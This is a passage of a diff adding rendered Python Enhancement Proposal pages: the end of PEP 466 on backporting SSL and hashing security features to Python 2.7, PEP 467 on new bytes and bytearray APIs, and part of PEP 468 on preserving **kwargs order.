  • Issue #21308: backport specified ssl module features
  • +
  • Issue #21307: backport remaining specified hashlib module features
  • +
  • Issue #21305: backport os.urandom shared file descriptor change
  • +
+
+
+

Backwards compatibility considerations

+

As in the Python 3 series, the backported ssl.create_default_context() +API is granted a backwards compatibility exemption that permits the +protocol, options, cipher and other settings of the created SSL context to +be updated in maintenance releases to use higher default security settings. +This allows them to appropriately balance compatibility and security at the +time of the maintenance release, rather than at the time of the original +feature release.

+

This PEP does not grant any other exemptions to the usual backwards +compatibility policy for maintenance releases. Instead, by explicitly +encouraging the use of feature based checks, it is designed to make it easier +to write more secure cross-version compatible Python software, while still +limiting the risk of breaking currently working software when upgrading to +a new Python 2.7 maintenance release.

+

In all cases where this proposal allows new features to be backported to +the Python 2.7 release series, it is possible to write cross-version +compatible code that operates by “feature detection” (for example, checking +for particular attributes in a module), without needing to explicitly check +the Python version.

+

It is then up to library and framework code to provide an appropriate warning +and fallback behaviour if a desired feature is found to be missing. While +some especially security sensitive software MAY fail outright if a desired +security feature is unavailable, most software SHOULD instead emit a warning +and continue operating using a slightly degraded security configuration.

+

The backported APIs allow library and application code to perform the +following actions after detecting the presence of a relevant +network security related feature:

+
    +
  • explicitly opt in to more secure settings (to allow the use of enhanced +security features in older maintenance releases of Python with less +secure default behaviour)
  • +
  • explicitly opt in to less secure settings (to allow the use of newer Python +feature releases in lower security environments)
  • +
  • determine the default setting for the feature (this MAY require explicit +Python version checks to determine the Python feature release, but DOES +NOT require checking for a specific maintenance release)
  • +
+

Security related changes to other modules (such as higher level networking +libraries and data format processing libraries) will continue to be made +available as backports and new modules on the Python Package Index, as +independent distribution remains the preferred approach to handling +software that must continue to evolve to handle changing development +requirements independently of the Python 2 standard library. Refer to +the Motivation and Rationale section for a review of the characteristics +that make the secure networking infrastructure worthy of special +consideration.

+
+

OpenSSL compatibility

+

Under this proposal, OpenSSL may be upgraded to more recent feature releases +in Python 2.7 maintenance releases. On Linux and most other POSIX systems, +the specific version of OpenSSL used already varies, as CPython dynamically +links to the system provided OpenSSL library by default.

+

For the Windows binary installers, the _ssl and _hashlib modules are +statically linked with OpenSSL and the associated symbols are not exported. +Marc-Andre Lemburg indicates that updating to newer OpenSSL releases in the +egenix-pyopenssl binaries has not resulted in any reported compatibility +issues [3]

+

The Mac OS X binary installers historically followed the same policy as +other POSIX installations and dynamically linked to the Apple provided +OpenSSL libraries. However, Apple has now ceased updating these +cross-platform libraries, instead requiring that even cross-platform +developers adopt Mac OS X specific interfaces to access up to date security +infrastructure on their platform. Accordingly, and independently of this +PEP, the Mac OS X binary installers were already going to be switched to +statically linker newer versions of OpenSSL [4]

+
+
+
+

Other Considerations

+
+

Maintainability

+

A number of developers, including Alex Gaynor and Donald Stufft, have +expressed interest in carrying out the feature backports covered by this +policy, and assisting with any additional maintenance burdens that arise +in the Python 2 series as a result.

+

Steve Dower and Brian Curtin have offered to help with the creation of the +Windows installers, allowing Martin von Löwis the opportunity to step back +from the task of maintaining the 2.7 Windows installer.

+

This PEP is primarily about establishing the consensus needed to allow them +to carry out this work. For other core developers, this policy change +shouldn’t impose any additional effort beyond potentially reviewing the +resulting patches for those developers specifically interested in the +affected modules.

+
+
+

Security releases

+

This PEP does not propose any changes to the handling of security +releases - those will continue to be source only releases that +include only critical security fixes.

+

However, the recommendations for library and application developers are +deliberately designed to accommodate commercial redistributors that choose +to apply these changes to additional Python release series that are either +in security fix only mode, or have been declared “end of life” by the core +development team.

+

Whether or not redistributors choose to exercise that option will be up +to the individual redistributor.

+
+
+

Integration testing

+

Third party integration testing services should offer users the ability +to test against multiple Python 2.7 maintenance releases (at least 2.7.6 +and 2.7.7+), to ensure that libraries, frameworks and applications can still +test their handling of the legacy security infrastructure correctly (either +failing or degrading gracefully, depending on the security sensitivity of +the software), even after the features covered in this proposal have been +backported to the Python 2.7 series.

+
+
+

Handling lower security environments with low risk tolerance

+

For better or for worse (mostly worse), there are some environments where +the risk of latent security defects is more tolerated than even a slightly +increased risk of regressions in maintenance releases. This proposal largely +excludes these environments from consideration where the modules covered by +the exemption are concerned - this approach is entirely inappropriate for +software connected to the public internet, and defence in depth security +principles suggest that it is not appropriate for most private networks +either.

+

Downstream redistributors may still choose to cater to such environments, +but they will need to handle the process of downgrading the security +related modules and doing the associated regression testing themselves. +The main CPython continuous integration infrastructure will not cover this +scenario.

+
+
+
+

Motivation and Rationale

+

The creation of this PEP was prompted primarily by the aging SSL support in +the Python 2 series. As of March 2014, the Python 2.7 SSL module is +approaching four years of age, and the SSL support in the still popular +Python 2.6 release had its feature set locked six years ago.

+

These are simply too old to provide a foundation that can be recommended +in good conscience for secure networking software that operates over the +public internet, especially in an era where it is becoming quite clearly +evident that advanced persistent security threats are even more widespread +and more indiscriminate in their targeting than had previously been +understood. While they represented reasonable security infrastructure in +their time, the state of the art has moved on, and we need to investigate +mechanisms for effectively providing more up to date network security +infrastructure for users that, for whatever reason, are not currently in +a position to migrate to Python 3.

+

While the use of the system OpenSSL installation addresses many of these +concerns on Linux platforms, it doesn’t address all of them (in particular, +it is still difficult for sotware to explicitly require some higher level +security settings). The standard library support can be bypassed by using a +third party library like PyOpenSSL or Pycurl, but this still results in a +security problem, as these can be difficult dependencies to deploy, and many +users will remain unaware that they might want them. Rather than explaining +to potentially naive users how to obtain and use these libraries, it seems +better to just fix the included batteries.

+

In the case of the binary installers for Windows and Mac OS X that are +published on python.org, the version of OpenSSL used is entirely within +the control of the Python core development team, but is currently limited +to OpenSSL maintenance releases for the version initially shipped with the +corresponding Python feature release.

+

With increased popularity comes increased responsibility, and this proposal +aims to acknowledge the fact that Python’s popularity and adoption is at a +sufficiently high level that some of our design and policy decisions have +significant implications beyond the Python development community.

+

As one example, the Python 2 ssl module does not support the Server +Name Indication standard. While it is possible to obtain SNI support +by using the third party requests client library, actually doing so +currently requires using not only requests and its embedded dependencies, +but also half a dozen or more additional libraries. The lack of support +in the Python 2 series thus serves as an impediment to making effective +use of SNI on servers, as Python 2 clients will frequently fail to handle +it correctly.

+

Another more critical example is the lack of SSL hostname matching in the +Python 2 standard library - it is currently necessary to rely on a third +party library, such as requests or backports.ssl_match_hostname to +obtain that functionality in Python 2.

+

The Python 2 series also remains more vulnerable to remote timing attacks +on security sensitive comparisons than the Python 3 series, as it lacks a +standard library equivalent to the timing attack resistant +hmac.compare_digest() function. While appropriate secure comparison +functions can be implemented in third party extensions, many users don’t +even consider the issue and use ordinary equality comparisons instead +- while a standard library solution doesn’t automatically fix that problem, +it does make the barrier to resolution much lower once the problem is +pointed out.

+

Python 2.7 represents the only long term maintenance release the core +development team has provided, and it is natural that there will be things +that worked over a historically shorter maintenance lifespan that don’t work +over this longer support period. In the specific case of the problem +described in this PEP, the simplest available solution is to acknowledge +that long term maintenance of network security related modules requires +the ability to add new features, even while retaining backwards compatibility +for existing interfaces.

+

For those familiar with it, it is worth comparing the approach described in +this PEP with Red Hat’s handling of its long term open source support +commitments: it isn’t the RHEL 6.0 release itself that receives 10 years +worth of support, but the overall RHEL 6 series. The individual RHEL 6.x +point releases within the series then receive a wide variety of new +features, including security enhancements, all while meeting strict +backwards compatibility guarantees for existing software. The proposal +covered in this PEP brings our approach to long term maintenance more into +line with this precedent - we retain our strict backwards compatibility +requirements, but make an exception to the restriction against adding new +features.

+

To date, downstream redistributors have respected our upstream policy of +“no new features in Python maintenance releases”. This PEP explicitly +accepts that a more nuanced policy is appropriate in the case of network +security related features, and the specific change it describes is +deliberately designed such that it is potentially suitable for Red Hat +Enterprise Linux and its downstream derivatives.

+
+

Why these particular changes?

+

The key requirement for a feature to be considered for inclusion in this +proposal was that it must have security implications beyond the specific +application that is written in Python and the system that application is +running on. Thus the focus on network security protocols, password storage +and related cryptographic infrastructure - Python is a popular choice for +the development of web services and clients, and thus the capabilities of +widely used Python versions have implications for the security design of +other services that may themselves be using newer versions of Python or +other development languages, but need to interoperate with clients or +servers written using older versions of Python.

+

The intent behind this requirement was to minimise any impact that the +introduction of this policy may have on the stability and compatibility of +maintenance releases, while still addressing some key security concerns +relating to the particular aspects of Python 2.7. It would be thoroughly +counterproductive if end users became as cautious about updating to new +Python 2.7 maintenance releases as they are about updating to new feature +releases within the same release series.

+

The ssl module changes are included in this proposal to bring the +Python 2 series up to date with the past 4 years of evolution in network +security standards, and make it easier for those standards to be broadly +adopted in both servers and clients. Similarly the hash algorithm +availability indicators in hashlib are included to make it easier for +applications to detect and employ appropriate hash definitions across both +Python 2 and 3.

+

The hmac.compare_digest() and hashlib.pbkdf2_hmac() are included to +help lower the barriers to secure password storage and checking in Python 2 +server applications.

+

The os.urandom() change has been included in this proposal to further +encourage users to leave the task of providing high quality random numbers +for cryptographic use cases to operating system vendors. The use of +insufficiently random numbers has the potential to compromise any +cryptographic system, and operating system developers have more tools +available to address that problem adequately than the typical Python +application runtime.

+
+
+

Rejected alternative: just advise developers to migrate to Python 3

+

This alternative represents the status quo. Unfortunately, it has proven +to be unworkable in practice, as the backwards compatibility implications +mean that this is a non-trivial migration process for large applications +and integration projects. While the tools for migration have evolved to +a point where it is possible to migrate even large applications +opportunistically and incrementally (rather than all at once) by updating +code to run in the large common subset of Python 2 and Python 3, using the +most recent technology often isn’t a priority in commercial environments.

+

Previously, this was considered an acceptable harm, as while it was an +unfortunate problem for the affected developers to have to face, it was +seen as an issue between them and their management chain to make the case +for infrastructure modernisation, and this case would become naturally +more compelling as the Python 3 series evolved.

+

However, now that we’re fully aware of the impact the limitations of the +Python 2 standard library may be having on the evolution of internet +security standards, I no longer believe that it is reasonable to expect +platform and application developers to resolve all of the latent defects +in an application’s Unicode correctness solely in order to gain access to +the network security enhancements already available in Python 3.

+

While Ubuntu (and to some extent Debian as well) are committed to porting all +default system services and scripts to Python 3, and to removing Python 2 +from its default distribution images (but not from its archives), this is +a mammoth task and won’t be completed for the Ubuntu 14.04 LTS release +(at least for the desktop image - it may be achieved for the mobile and +server images).

+

Fedora has even more work to do to migrate, and it will take a non-trivial +amount of time to migrate the relevant infrastructure components. While +Red Hat are also actively working to make it easier for users to use more +recent versions of Python on our stable platforms, it’s going to take time +for those efforts to start having an impact on end users’ choice of version, +and any such changes also don’t benefit the core platform infrastructure +that runs in the integrated system Python by necessity.

+

The OpenStack migration to Python 3 is also still in its infancy, and even +though that’s a project with an extensive and relatively robust automated +test suite, it’s still large enough that it is going to take quite some time +to migrate fully to a Python 2/3 compatible code base.

+

And that’s just three of the highest profile open source projects that +make heavy use of Python. Given the likely existence of large amounts of +legacy code that lacks the kind of automated regression test suite needed +to help support a migration from Python 2 to Python 3, there are likely to +be many cases where reimplementation (perhaps even in Python 3) proves +easier than migration. The key point of this PEP is that those situations +affect more people than just the developers and users of the affected +application: the existence of clients and servers with outdated network +security infrastructure becomes something that developers of secure +networked services need to take into account as part of their security +design, and that’s a problem that inhibits the adoption of better security +standards.

+

As Terry Reedy noted, if we try to persist with the status quo, the likely +outcome is that commercial redistributors will attempt to do something +like this on behalf of their customers anyway, but in a potentially +inconsistent and ad hoc manner. By drawing the scope definition process +into the upstream project we are in a better position to influence the +approach taken to address the situation and to help ensure some consistency +across redistributors.

+

The problem is real, so something needs to change, and this PEP describes +my preferred approach to addressing the situation.

+
+
+

Rejected alternative: create and release Python 2.8

+

With sufficient corporate support, it likely would be possible to create +and release Python 2.8 (it’s highly unlikely such a project would garner +enough interest to be achievable with only volunteers). However, this +wouldn’t actually solve the problem, as the aim is to provide a relatively +low impact way to incorporate enhanced security features into integrated +products and deployments that make use of Python 2.

+

Upgrading to a new Python feature release would mean both more work for the +core development team, as well as a more disruptive update that most +potential end users would likely just skip entirely.

+

Attempting to create a Python 2.8 release would also bring in suggestions +to backport many additional features from Python 3 (such as tracemalloc +and the improved coroutine support), making the migration from Python 2.7 +to this hypothetical 2.8 release even riskier and more disruptive.

+

This is not a recommended approach, as it would involve substantial +additional work for a result that is actually less effective in achieving +the original aim (which is to eliminate the current widespread use of the +aging network security infrastructure in the Python 2 series).

+

Furthermore, while I can’t make any commitments to actually addressing +this issue on Red Hat platforms, I can categorically rule out the idea +of a Python 2.8 being of any use to me in even attempting to get it +addressed.

+
+
+

Rejected alternative: distribute the security enhancements via PyPI

+

While this initially appears to be an attractive and easier to manage +approach, it actually suffers from several significant problems.

+

Firstly, this is complex, low level, cross-platform code that integrates +with the underlying operating system across a variety of POSIX platforms +(including Mac OS X) and Windows. The CPython BuildBot fleet is already set +up to handle continuous integration in that context, but most of the +freely available continuous integration services just offer Linux, and +perhaps paid access to Windows. Those services work reasonably well for +software that largely runs on the abstraction layers offered by Python and +other dynamic languages, as well as the more comprehensive abstraction +offered by the JVM, but won’t suffice for the kind of code involved here.

+

The OpenSSL dependency for the network security support also qualifies as +the kind of “complex binary dependency” that isn’t yet handled well by the +pip based software distribution ecosystem. Relying on a third party +binary dependency also creates potential compatibility problems for pip +when running on other interpreters like PyPy.

+

Another practical problem with the idea is the fact that pip itself +relies on the ssl support in the standard library (with some additional +support from a bundled copy of requests, which in turn bundles +backport.ssl_match_hostname), and hence would require any replacement +module to also be bundled within pip. This wouldn’t pose any +insurmountable difficulties (it’s just another dependency to vendor), but +it would mean yet another copy of OpenSSL to keep up to date.

+

This approach also has the same flaw as all other “improve security by +renaming things” approaches: they completely miss the users who most need +help, and raise significant barriers against being able to encourage users +to do the right thing when their infrastructure supports it (since +“use this other module” is a much higher impact change than “turn on this +higher security setting”). Deprecating the aging SSL infrastructure in the +standard library in favour of an external module would be even more user +hostile than accepting the slightly increased risk of regressions associated +with upgrading it in place.

+

Last, but certainly not least, this approach suffers from the same problem +as the idea of doing a Python 2.8 release: likely not solving the actual +problem. Commercial redistributors of Python are set up to redistribute +Python, and a pre-existing set of additional packages. Getting new +packages added to the pre-existing set can be done, but means approaching +each and every redistributor and asking them to update their +repackaging process accordingly. By contrast, the approach described in +this PEP would require redistributors to deliberately opt out of the +security enhancements by deliberately downgrading the provided network +security infrastructure, which most of them are unlikely to do.

+
+
+

Rejected variant: provide a “legacy SSL infrastructure” branch

+

Earlier versions of this PEP included the concept of a 2.7-legacy-ssl +branch that preserved the exact feature set of the Python 2.7.6 network +security infrastructure.

+

In my opinion, anyone that actually wants this is almost certainly making a +mistake, and if they insist they really do want it in their specific +situation, they’re welcome to either make it themselves or arrange for a +downstream redistributor to make it for them.

+

If they are made publicly available, any such rebuilds should be referred to +as “Python 2.7 with Legacy SSL” to clearly distinguish them from the official +Python 2.7 releases that include more up to date network security +infrastructure.

+

After the first Python 2.7 maintenance release that implements this PEP, it +would also be appropriate to refer to Python 2.7.6 and earlier releases as +“Python 2.7 with Legacy SSL”.

+
+
+

Rejected variant: synchronise particular modules entirely with Python 3

+

Earlier versions of this PEP suggested synchronising the hmac, +hashlib and ssl modules entirely with their Python 3 counterparts.

+

This approach proved too vague to build a compelling case for the exception, +and has thus been replaced by the current more explicit proposal.

+
+
+

Rejected variant: open ended backport policy

+

Earlier versions of this PEP suggested a general policy change related to +future Python 3 enhancements that impact the general security of the +internet.

+

That approach created unnecessary uncertainty, so it has been simplified to +propose backport a specific concrete set of changes. Future feature +backport proposals can refer back to this PEP as precedent, but it will +still be necessary to make a specific case for each feature addition to +the Python 2.7 long-term support release.

+
+
+
+

Disclosure of Interest

+

The author of this PEP currently works for Red Hat on test automation tools. +If this proposal is accepted, I will be strongly encouraging Red Hat to take +advantage of the resulting opportunity to help improve the overall security +of the Python ecosystem. However, I do not speak for Red Hat in this matter, +and cannot make any commitments on Red Hat’s behalf.

+
+
+

Acknowledgements

+

Thanks to Christian Heimes and other for their efforts in greatly improving +Python’s SSL support in the Python 3 series, and a variety of members of +the Python community for helping me to better understand the implications +of the default settings we provide in our SSL modules, and the impact that +tolerating the use of SSL infrastructure that was defined in 2010 +(Python 2.7) or even 2008 (Python 2.6) potentially has for the security +of the web as a whole.

+

Thanks to Donald Stufft and Alex Gaynor for identifying a more limited set +of essential security features that allowed the proposal to be made more +fine-grained than backporting entire modules from Python 3.4 ([7], [8]).

+

Christian and Donald also provided valuable feedback on a preliminary +draft of this proposal.

+

Thanks also to participants in the python-dev mailing list threads +([1], [2], [5], [6]), as well as the various folks I discussed this issue with at +PyCon 2014 in Montreal.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0466.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0467/index.html b/pep-0467/index.html new file mode 100644 index 00000000000..493fb015638 --- /dev/null +++ b/pep-0467/index.html @@ -0,0 +1,354 @@ + + + + + + + + PEP 467 – Minor API improvements for binary sequences | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 467 – Minor API improvements for binary sequences

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, Ethan Furman <ethan at stoneleaf.us>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
30-Mar-2014
+
Python-Version:
+
3.13
+
Post-History:
+
30-Mar-2014, 15-Aug-2014, 16-Aug-2014, 07-Jun-2016, 01-Sep-2016, +13-Apr-2021, 03-Nov-2021, 27-Dec-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes small adjustments to the APIs of the bytes and +bytearray types to make it easier to operate entirely in the binary domain:

+
    +
  • Add fromsize alternative constructor
  • +
  • Add fromint alternative constructor
  • +
  • Add getbyte byte retrieval method
  • +
  • Add iterbytes alternative iterator
  • +
+
+
+

Rationale

+

During the initial development of the Python 3 language specification, the +core bytes type for arbitrary binary data started as the mutable type +that is now referred to as bytearray. Other aspects of operating in +the binary domain in Python have also evolved over the course of the Python +3 series, for example with PEP 461.

+
+
+

Motivation

+

With Python 3 and the split between str and bytes, one small but +important area of programming became slightly more difficult, and much more +painful – wire format protocols.

+

This area of programming is characterized by a mixture of binary data and +ASCII compatible segments of text (aka ASCII-encoded text). The addition of +the new constructors, methods, and iterators will aid both in writing new +wire format code, and in porting any remaining Python 2 wire format code.

+

Common use-cases include dbf and pdf file formats, email +formats, and FTP and HTTP communications, among many others.

+
+
+

Proposals

+
+

Addition of explicit “count and byte initialised sequence” constructors

+

To replace the discouraged behavior of creating zero-filled bytes-like +objects from the basic constructors (i.e. bytes(1) –> b'\x00'), this +PEP proposes the addition of an explicit fromsize alternative constructor +as a class method on both bytes and bytearray whose first argument +is the count, and whose second argument is the fill byte to use (defaults +to \x00):

+
>>> bytes.fromsize(3)
+b'\x00\x00\x00'
+>>> bytearray.fromsize(3)
+bytearray(b'\x00\x00\x00')
+>>> bytes.fromsize(5, b'\x0a')
+b'\x0a\x0a\x0a\x0a\x0a'
+>>> bytearray.fromsize(5, fill=b'\x0a')
+bytearray(b'\x0a\x0a\x0a\x0a\x0a')
+
+
+

fromsize will behave just as the current constructors behave when passed a +single integer, while allowing for non-zero fill values when needed.

+
+
+

Addition of explicit “single byte” constructors

+

As binary counterparts to the text chr function, this PEP proposes +the addition of an explicit fromint alternative constructor as a class +method on both bytes and bytearray:

+
>>> bytes.fromint(65)
+b'A'
+>>> bytearray.fromint(65)
+bytearray(b'A')
+
+
+

These methods will only accept integers in the range 0 to 255 (inclusive):

+
>>> bytes.fromint(512)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+ValueError: integer must be in range(0, 256)
+
+>>> bytes.fromint(1.0)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: 'float' object cannot be interpreted as an integer
+
+
+

The documentation of the ord builtin will be updated to explicitly note +that bytes.fromint is the primary inverse operation for binary data, while +chr is the inverse operation for text data, and that bytearray.fromint +also exists.

+

Behaviorally, bytes.fromint(x) will be equivalent to the current +bytes([x]) (and similarly for bytearray). The new spelling is +expected to be easier to discover and easier to read (especially when used +in conjunction with indexing operations on binary sequence types).

+

As a separate method, the new spelling will also work better with higher +order functions like map.

+

These new methods intentionally do NOT offer the same level of general integer +support as the existing int.to_bytes conversion method, which allows +arbitrarily large integers to be converted to arbitrarily long bytes objects. The +restriction to only accept positive integers that fit in a single byte means +that no byte order information is needed, and there is no need to handle +negative numbers. The documentation of the new methods will refer readers to +int.to_bytes for use cases where handling of arbitrary integers is needed.

+
+
+

Addition of “getbyte” method to retrieve a single byte

+

This PEP proposes that bytes and bytearray gain the method getbyte +which will always return bytes:

+
>>> b'abc'.getbyte(0)
+b'a'
+
+
+

If an index is asked for that doesn’t exist, IndexError is raised:

+
>>> b'abc'.getbyte(9)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+IndexError: index out of range
+
+
+
+
+

Addition of optimised iterator methods that produce bytes objects

+

This PEP proposes that bytes and bytearray gain an optimised +iterbytes method that produces length 1 bytes objects rather than +integers:

+
for x in data.iterbytes():
+    # x is a length 1 ``bytes`` object, rather than an integer
+
+
+

For example:

+
>>> tuple(b"ABC".iterbytes())
+(b'A', b'B', b'C')
+
+
+
+
+
+

Design discussion

+
+

Why not rely on sequence repetition to create zero-initialised sequences?

+

Zero-initialised sequences can be created via sequence repetition:

+
>>> b'\x00' * 3
+b'\x00\x00\x00'
+>>> bytearray(b'\x00') * 3
+bytearray(b'\x00\x00\x00')
+
+
+

However, this was also the case when the bytearray type was originally +designed, and the decision was made to add explicit support for it in the +type constructor. The immutable bytes type then inherited that feature +when it was introduced in PEP 3137.

+

This PEP isn’t revisiting that original design decision, just changing the +spelling as users sometimes find the current behavior of the binary sequence +constructors surprising. In particular, there’s a reasonable case to be made +that bytes(x) (where x is an integer) should behave like the +bytes.fromint(x) proposal in this PEP. Providing both behaviors as separate +class methods avoids that ambiguity.

+
+
+

Current Workarounds

+

After nearly a decade, there’s seems to be no consensus on the best workarounds +for byte iteration, as demonstrated by +Get single-byte bytes objects from bytes objects.

+
+
+

Omitting the originally proposed builtin function

+

When submitted to the Steering Council, this PEP proposed the introduction of +a bchr builtin (with the same behaviour as bytes.fromint), recreating +the ord/chr/unichr trio from Python 2 under a different naming +scheme (ord/bchr/chr).

+

The SC indicated they didn’t think this functionality was needed often enough +to justify offering two ways of doing the same thing, especially when one of +those ways was a new builtin function. That part of the proposal was therefore +dropped as being redundant with the bytes.fromint alternate constructor.

+

Developers that use this method frequently will instead have the option to +define their own bchr = bytes.fromint aliases.

+
+
+

Scope limitation: memoryview

+

Updating memoryview with the new item retrieval methods is outside the scope +of this PEP.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0467.rst

+

Last modified: 2024-02-07 13:44:54 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0468/index.html b/pep-0468/index.html new file mode 100644 index 00000000000..d109e05b354 --- /dev/null +++ b/pep-0468/index.html @@ -0,0 +1,555 @@ + + + + + + + + PEP 468 – Preserving the order of **kwargs in a function. | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 468 – Preserving the order of **kwargs in a function.

+
+
Author:
+
Eric Snow <ericsnowcurrently at gmail.com>
+
Discussions-To:
+
Python-Ideas list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
05-Apr-2014
+
Python-Version:
+
3.6
+
Post-History:
+
05-Apr-2014, 08-Sep-2016
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

The **kwargs syntax in a function definition indicates that the +interpreter should collect all keyword arguments that do not correspond +to other named parameters. However, Python does not preserved the +order in which those collected keyword arguments were passed to the +function. In some contexts the order matters. This PEP dictates that +the collected keyword arguments be exposed in the function body as an +ordered mapping.

+
+
+

Motivation

+

Python’s **kwargs syntax in function definitions provides a powerful +means of dynamically handling keyword arguments. In some applications +of the syntax (see Use Cases), the semantics applied to the +collected keyword arguments requires that order be preserved. +Unsurprisingly, this is similar to how OrderedDict is related to dict.

+

Currently to preserved the order you have to do so manually and +separately from the actual function call. This involves building an +ordered mapping, whether an OrderedDict or an iterable of 2-tuples, +which is then passed as a single argument to the function. +[1]

+

With the capability described in this PEP, that boilerplate would no +longer be required.

+

For comparison, currently:

+
kwargs = OrderedDict()
+kwargs['eggs'] = ...
+...
+def spam(a, kwargs):
+    ...
+
+
+

and with this proposal:

+
def spam(a, **kwargs):
+    ...
+
+
+

Alyssa (Nick) Coghlan, speaking of some of the uses cases, summed it up well +[2]:

+
These *can* all be done today, but *not* by using keyword arguments.
+In my view, the problem to be addressed is that keyword arguments
+*look* like they should work for these cases, because they have a
+definite order in the source code. The only reason they don't work
+is because the interpreter throws that ordering information away.
+
+It's a textbook case of a language feature becoming an attractive
+nuisance in some circumstances: the simple and obvious solution for
+the above use cases *doesn't actually work* for reasons that aren't
+obviously clear if you don't have a firm grasp of Python's admittedly
+complicated argument handling.
+
+
+

This observation is supported by the appearance of this proposal over +the years and the numerous times that people have been confused by the +constructor for OrderedDict. [3] [4] +[5]

+
+
+

Use Cases

+

As Alyssa noted, the current behavior of **kwargs is unintuitive in +cases where one would expect order to matter. Aside from more specific +cases outlined below, in general “anything else where you want to +control the iteration order and set field names and values in a single +call will potentially benefit.” [6] That matters in the +case of factories (e.g. __init__()) for ordered types.

+
+

Serialization

+

Obviously OrderedDict would benefit (both __init__() and update()) from +ordered kwargs. However, the benefit also extends to serialization +APIs [2]:

+
In the context of serialisation, one key lesson we have learned is
+that arbitrary ordering is a problem when you want to minimise
+spurious diffs, and sorting isn't a simple solution.
+
+Tools like doctest don't tolerate spurious diffs at all, but are
+often amenable to a sorting based answer.
+
+The cases where it would be highly desirable to be able use keyword
+arguments to control the order of display of a collection of key
+value pairs are ones like:
+
+* printing out key:value pairs in CLI output
+* mapping semantic names to column order in a CSV
+* serialising attributes and elements in particular orders in XML
+* serialising map keys in particular orders in human readable formats
+  like JSON and YAML (particularly when they're going to be placed
+  under source control)
+
+
+
+
+

Debugging

+

In the words of Raymond Hettinger [7]:

+
It makes it easier to debug if the arguments show-up in the order
+they were created.  AFAICT, no purpose is served by scrambling them.
+
+
+
+
+

Other Use Cases

+
    +
  • Mock objects. [8]
  • +
  • Controlling object presentation.
  • +
  • Alternate namedtuple() where defaults can be specified.
  • +
  • Specifying argument priority by order.
  • +
+
+
+
+

Concerns

+
+

Performance

+

As already noted, the idea of ordered keyword arguments has come up on +a number of occasions. Each time it has been met with the same +response, namely that preserving keyword arg order would have a +sufficiently adverse effect on function call performance that it’s not +worth doing. However, Guido noted the following [9]:

+
Making **kwds ordered is still open, but requires careful design and
+implementation to avoid slowing down function calls that don't benefit.
+
+
+

As will be noted below, there are ways to work around this at the +expense of increased complication. Ultimately the simplest approach is +the one that makes the most sense: pack collected key word arguments +into an OrderedDict. However, without a C implementation of OrderedDict +there isn’t much to discuss. That changed in Python 3.5. +[10]

+

Note: in Python 3.6 dict is order-preserving. This virtually eliminates +performance concerns.

+
+
+

Other Python Implementations

+

Another important issue to consider is that new features must be +cognizant of the multiple Python implementations. At some point each of +them would be expected to have implemented ordered kwargs. In this +regard there doesn’t seem to be an issue with the idea. [11] +An informal survey of the major Python implementations has indicated +that this feature will not be a significant burden.

+
+
+
+

Specification

+

Starting in version 3.6 Python will preserve the order of keyword +arguments as passed to a function. To accomplish this the collected +kwargs will now be an ordered mapping. Note that this does not necessarily +mean OrderedDict. dict in CPython 3.6 is now ordered, similar to PyPy.

+

This will apply only to functions for which the definition uses the +**kwargs syntax for collecting otherwise unspecified keyword +arguments. Only the order of those keyword arguments will be +preserved.

+
+

Relationship to **-unpacking syntax

+

The ** unpacking syntax in function calls has no special connection with +this proposal. Keyword arguments provided by unpacking will be treated +in exactly the same way as they are now: ones that match defined +parameters are gather there and the remainder will be collected into the +ordered kwargs (just like any other unmatched keyword argument).

+

Note that unpacking a mapping with undefined order, such as dict, will +preserve its iteration order like normal. It’s just that the order will +remain undefined. The ordered mapping into which the unpacked key-value +pairs will then be packed will not be able to provide any alternate +ordering. This should not be surprising.

+

There have been brief discussions of simply passing these mappings +through to the functions kwargs without unpacking and repacking them, +but that is both outside the scope of this proposal and probably a bad +idea regardless. (There is a reason those discussions were brief.)

+
+
+

Relationship to inspect.Signature

+

Signature objects should need no changes. The kwargs parameter of +inspect.BoundArguments (returned by Signature.bind() and +Signature.bind_partial()) will change from a dict to an OrderedDict.

+
+
+

C-API

+

No changes.

+
+
+

Syntax

+

No syntax is added or changed by this proposal.

+
+
+

Backward-Compatibility

+

The following will change:

+
    +
  • iteration order of kwargs will now be consistent (except of course in +the case described above)
  • +
+
+
+
+

Reference Implementation

+

For CPython there’s nothing to do.

+
+
+

Alternate Approaches

+
+

Opt-out Decorator

+

This is identical to the current proposal with the exception that Python +would also provide a decorator in functools that would cause collected +keyword arguments to be packed into a normal dict instead of an +OrderedDict.

+

Prognosis:

+

This would only be necessary if performance is determined to be +significantly different in some uncommon cases or that there are other +backward-compatibility concerns that cannot be resolved otherwise.

+
+
+

Opt-in Decorator

+

The status quo would be unchanged. Instead Python would provide a +decorator in functools that would register or mark the decorated +function as one that should get ordered keyword arguments. The +performance overhead to check the function at call time would be +marginal.

+

Prognosis:

+

The only real down-side is in the case of function wrappers factories +(e.g. functools.partial and many decorators) that aim to perfectly +preserve keyword arguments by using kwargs in the wrapper definition +and kwargs unpacking in the call to the wrapped function. Each wrapper +would have to be updated separately, though having functools.wraps() do +this automaticallywould help.

+
+
+

__kworder__

+

The order of keyword arguments would be stored separately in a list at +call time. The list would be bound to __kworder__ in the function +locals.

+

Prognosis:

+

This likewise complicates the wrapper case.

+
+
+

Compact dict with faster iteration

+

